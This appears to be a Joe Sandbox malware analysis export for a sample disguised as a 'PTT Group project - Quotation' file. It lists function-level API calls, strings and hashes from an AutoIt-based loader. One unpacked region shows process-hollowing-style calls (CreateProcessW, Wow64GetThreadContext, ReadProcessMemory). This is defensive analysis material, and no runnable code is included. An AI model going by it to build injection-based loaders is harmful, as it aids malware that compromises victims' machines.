Instruction Fuzzy Hash: B7B2D270608741DFD724DF24D894BAAB7E5BFC4304F15491DF99A872A2DB74E888CB82

Function 009793DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009791E9: __time64.LIBCMT ref: 009791F3

Part of subcall function 00915045: _fseek.LIBCMT ref: 0091505D

__wsplitpath.LIBCMT ref: 009794BE

Part of subcall function 0093432E: __wsplitpath_helper.LIBCMT ref: 0093436E

_wcscpy.LIBCMT ref: 009794D1
_wcscat.LIBCMT ref: 009794E4
__wsplitpath.LIBCMT ref: 00979509
_wcscat.LIBCMT ref: 0097951F
_wcscat.LIBCMT ref: 00979532

Part of subcall function 0097922F: _memmove.LIBCMT ref: 00979268
Part of subcall function 0097922F: _memmove.LIBCMT ref: 00979277

_wcscmp.LIBCMT ref: 00979479

Part of subcall function 009799BE: _wcscmp.LIBCMT ref: 00979AAE
Part of subcall function 009799BE: _wcscmp.LIBCMT ref: 00979AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009796DC
_wcsncpy.LIBCMT ref: 0097974F
DeleteFileW.KERNEL32(?,?), ref: 00979785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0097979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009797AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009797BE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: b6f56d6e4e2b84c78a5da26f004de794aa942c3ac7584b18711b48a2e6c26c70
Instruction ID: 977c723bc2216eb9c0df7ccf0a677505c0e2cbf77fdddc6b959c27450b1af48a
Opcode Fuzzy Hash: b6f56d6e4e2b84c78a5da26f004de794aa942c3ac7584b18711b48a2e6c26c70
Instruction Fuzzy Hash: 1AC10DB2E00119AADF15DF95CC85BDEB7BDEF89310F0040AAF609E7151EB709A848F65

Function 00913015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00913074
RegisterClassExW.USER32(00000030), ref: 0091309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009130AF
InitCommonControlsEx.COMCTL32(?), ref: 009130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009130DC
LoadIconW.USER32(000000A9), ref: 009130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00913101

Strings

+, xrefs: 0091305D
TaskbarCreated, xrefs: 009130A4
0, xrefs: 00913056
AutoIt v3 GUI, xrefs: 00913090

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 123d7680610f98964eea9b2fd06a76d6760a46bca5bd6b03748294826ee95ba5
Instruction ID: 3fca65c4b511175f5998e1f655b0c9694c066cbd67e8941f1133760840319049
Opcode Fuzzy Hash: 123d7680610f98964eea9b2fd06a76d6760a46bca5bd6b03748294826ee95ba5
Instruction Fuzzy Hash: 3331697196A309AFDB10CFA8DC89ADDBBF4FB09310F14402BE550E62A0D7B60581EF90

Function 00913041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00913074
RegisterClassExW.USER32(00000030), ref: 0091309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009130AF
InitCommonControlsEx.COMCTL32(?), ref: 009130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009130DC
LoadIconW.USER32(000000A9), ref: 009130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00913101

Strings

+, xrefs: 0091305D
TaskbarCreated, xrefs: 009130A4
0, xrefs: 00913056
AutoIt v3 GUI, xrefs: 00913090

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: ab95cf150f3443558fb8edea25872c618bb8c8b0cb6a28f6ed176be9ea342510
Instruction ID: ab8a7af15c6c1b3b2365f7a67eebd26dfbd11f88f3b0e6f60f3b8d9bce7977a7
Opcode Fuzzy Hash: ab95cf150f3443558fb8edea25872c618bb8c8b0cb6a28f6ed176be9ea342510
Instruction Fuzzy Hash: D321B7B1966218AFDB00DF98E949ADDBBF8FB08700F10412BF510E62A0D7B14594AF91

Function 009171EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00914864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009D62F8,?,009137C0,?), ref: 00914882

Part of subcall function 0093074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009172C5), ref: 00930771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00917308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0094ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0094ED32
RegCloseKey.ADVAPI32(?), ref: 0094ED70
_wcscat.LIBCMT ref: 0094EDC9

Strings

\, xrefs: 0094EDEC
Include, xrefs: 0094ECE8, 0094ED29
\Include\, xrefs: 009172C5
Software\AutoIt v3\AutoIt, xrefs: 009172FE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 77e430f0cd638eadfde3ad25abc36f45518b1e944b1c5dc82ed7885f16e7e4f6
Instruction ID: f0e547f0f6fa9d908b24d419044a20d28c733740984d898a12bc4e582b5142ca
Opcode Fuzzy Hash: 77e430f0cd638eadfde3ad25abc36f45518b1e944b1c5dc82ed7885f16e7e4f6
Instruction Fuzzy Hash: A7716A7155D3459AC314DFA5EC819ABF7F8FF88300F80492EF555831A0EB309988DB91

Function 00913A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00913A62
LoadCursorW.USER32(00000000,00007F00), ref: 00913A71
LoadIconW.USER32(00000063), ref: 00913A88
LoadIconW.USER32(000000A4), ref: 00913A9A
LoadIconW.USER32(000000A2), ref: 00913AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00913AD2
RegisterClassExW.USER32(?), ref: 00913B28

Part of subcall function 00913041: GetSysColorBrush.USER32(0000000F), ref: 00913074
Part of subcall function 00913041: RegisterClassExW.USER32(00000030), ref: 0091309E
Part of subcall function 00913041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009130AF
Part of subcall function 00913041: InitCommonControlsEx.COMCTL32(?), ref: 009130CC
Part of subcall function 00913041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009130DC
Part of subcall function 00913041: LoadIconW.USER32(000000A9), ref: 009130F2
Part of subcall function 00913041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00913101

Strings

0, xrefs: 00913B06
AutoIt v3, xrefs: 00913B17
#, xrefs: 00913B0D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 71aedd4132a1e0651e7b1783ee86d61ddc34f836e8f52408876bfe99a475b3e8
Instruction ID: b28624597dd572f409463ae41cfba2c0a26c3cf18658defc082881ea55020ac2
Opcode Fuzzy Hash: 71aedd4132a1e0651e7b1783ee86d61ddc34f836e8f52408876bfe99a475b3e8
Instruction Fuzzy Hash: AE216F74A6A308AFDB109FA4EC05B9D7BB4FB08711F00412BE614E62A0D3B55594AF40

Function 00913633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 009136D2
KillTimer.USER32(?,00000001), ref: 009136FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0091371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0091372A
CreatePopupMenu.USER32 ref: 0091373E
PostQuitMessage.USER32(00000000), ref: 0091375F

Strings

TaskbarCreated, xrefs: 00913725

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: bc583236f5f9e545423b499f3bb171db858be608428017bde0ad1fded88cc757
Instruction ID: 8e7cde949dca7e768cced4f41de2d45b27c6f8b234920306a7c89021d336536c
Opcode Fuzzy Hash: bc583236f5f9e545423b499f3bb171db858be608428017bde0ad1fded88cc757
Instruction Fuzzy Hash: 1B415AB235910CABDF205F68EC0ABFD37B9E740340F04852BF612C22E1CA649DD0A261

Function 00913778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 009137C0
CMDLINE, xrefs: 00913834
CMDLINERAW, xrefs: 0091380D
/AutoIt3ExecuteLine, xrefs: 009138B9
/AutoIt3ExecuteScript, xrefs: 009138CE
/ErrorStdOut, xrefs: 0091388F
/AutoIt3OutputDebug, xrefs: 009138A4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 5f2d2d186647e50c09b77e093e220e6e367f175c0e63c6bea701381b59b4e8e5
Instruction ID: af166bb14541ebd616af9ac9811832cef65e7b859b66d0dce42d9c9466fd8fca
Opcode Fuzzy Hash: 5f2d2d186647e50c09b77e093e220e6e367f175c0e63c6bea701381b59b4e8e5
Instruction Fuzzy Hash: 45A16071A5421D9ACF04EFA4CC91FEEB779BF94300F40442AF416A7191DF745A89CB60

Function 00872610 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 008726E1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00872907

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: d2e17a74b3bc5c8b3387eaa6ba57d042ac2d2cd5d4461231a9e5da89d7ae81c2
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: DDA12770E00209EBDB14CFA4C994BEEBBB5FF48304F208169E519BB284D7759A81DF95

Function 009139E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00913A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00913A36
ShowWindow.USER32(00000000,?,?), ref: 00913A4A
ShowWindow.USER32(00000000,?,?), ref: 00913A53

Strings

AutoIt v3, xrefs: 00913A0D, 00913A12, 00913A13
edit, xrefs: 00913A30

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 621b2e6be119ec397bd99b10e43bd7e172ed9259e41856ac4237389f1af28935
Instruction ID: 180d42229e6a02051d808d3fe42183416ae9d8c4a5eb65d456cccd245eb705fe
Opcode Fuzzy Hash: 621b2e6be119ec397bd99b10e43bd7e172ed9259e41856ac4237389f1af28935
Instruction Fuzzy Hash: 87F03A706A62907EEE3017676C58E676F7DD7C6F50B00002BBA10E2170C2A60880EAB0

Function 008723B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008722A0: Sleep.KERNELBASE(000001F4), ref: 008722B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00872503

Strings

DD2O29V4QHQBEFO, xrefs: 00872566, 00872569

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateFileSleep
String ID: DD2O29V4QHQBEFO
API String ID: 2694422964-1785384132
Opcode ID: 223318ec6b192965a6227042da6802e452f810e4b1175e01efe67a162266558b
Instruction ID: 14be080f153dbf612f0b9e227c0cec443fb32a86b9d33d99c2eaafd084051476
Opcode Fuzzy Hash: 223318ec6b192965a6227042da6802e452f810e4b1175e01efe67a162266558b
Instruction Fuzzy Hash: E1517070E14248EBEF11DBA4C854BEEBB75EF58300F108199E608BB2C1D7BA5B45CB65

Function 0091410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0094D5EC

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

_memset.LIBCMT ref: 0091418D
_wcscpy.LIBCMT ref: 009141E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009141F1

Strings

Line: , xrefs: 0094D615

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: c7c53a5a6fa6bd87b0924f929ace63618dcd0c0fc7fe1b27e8855df563d55bd6
Instruction ID: c8182e3757257bf123d8f2e68c77dfeba5a2a8a06f852d87aa0c287c4ae8ccb9
Opcode Fuzzy Hash: c7c53a5a6fa6bd87b0924f929ace63618dcd0c0fc7fe1b27e8855df563d55bd6
Instruction Fuzzy Hash: 9131D37124D309AAD721EBA0DC45FDBB7ECAF98314F10491EF195920A1DB74A6C8CB92

Function 0093564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 009356AB
_memcpy_s.LIBCMT ref: 0093571D
__read_nolock.LIBCMT ref: 0093577B
__filbuf.LIBCMT ref: 0093579E
_memset.LIBCMT ref: 009357E2

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 56015b03d78ed7747e04c715aeec3bd178233779ce92287058676103d55dcb34
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 2051A470A00B05DBDB248F79C88566EB7B9EF88324F668729F836962D0D7749D508F40

Function 009169CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00914F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00914F6F

_free.LIBCMT ref: 0094E68C
_free.LIBCMT ref: 0094E6D3

Part of subcall function 00916BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00916D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0094E462
Bad directive syntax error, xrefs: 0094E6BB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 28c97635c585160c7903ff6139d1cbafabe37b3f6fd06a531283b7e3b07d03b8
Instruction ID: 732c88e6df1428bd5ecef310fd5843cb9ae401e52e2c4e5d5b02cf909c40d7fc
Opcode Fuzzy Hash: 28c97635c585160c7903ff6139d1cbafabe37b3f6fd06a531283b7e3b07d03b8
Instruction Fuzzy Hash: F8917D71A10219EFCF04EFA4C891EEDB7B8FF59314F144469F815AB2A1EB34A945CB50

Function 009135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009135A1,SwapMouseButtons,00000004,?), ref: 009135D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009135A1,SwapMouseButtons,00000004,?,?,?,?,00912754), ref: 009135F5
RegCloseKey.KERNELBASE(00000000,?,?,009135A1,SwapMouseButtons,00000004,?,?,?,?,00912754), ref: 00913617

Strings

Control Panel\Mouse, xrefs: 009135D2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 918832916414266349de2595e473723bd729e659b859ef5db38d5da1f7293ff5
Instruction ID: e72ab1a182d5a6949e7574cd7c2808521e75fd314513ef08acb82247ab87fffd
Opcode Fuzzy Hash: 918832916414266349de2595e473723bd729e659b859ef5db38d5da1f7293ff5
Instruction Fuzzy Hash: 9911487161420CBFDB208F69DC819EEB7BCEF45780F00846AE805D7210D2719E94AB60

Function 008712A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00871A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00871AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00871B13

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction ID: 51b37287e1e4e5fda7f0300e15860174b76ebf60cb54651b472a9ca3e72be4f3
Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction Fuzzy Hash: F6620930A14258DBEB24CFA4C844BDEB372FF58700F1091A9E50DEB694E7799E81CB59

Function 009797E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00915045: _fseek.LIBCMT ref: 0091505D

Part of subcall function 009799BE: _wcscmp.LIBCMT ref: 00979AAE
Part of subcall function 009799BE: _wcscmp.LIBCMT ref: 00979AC1

_free.LIBCMT ref: 0097992C
_free.LIBCMT ref: 00979933
_free.LIBCMT ref: 0097999E

Part of subcall function 00932F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00939C64), ref: 00932FA9
Part of subcall function 00932F95: GetLastError.KERNEL32(00000000,?,00939C64), ref: 00932FBB

_free.LIBCMT ref: 009799A6

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

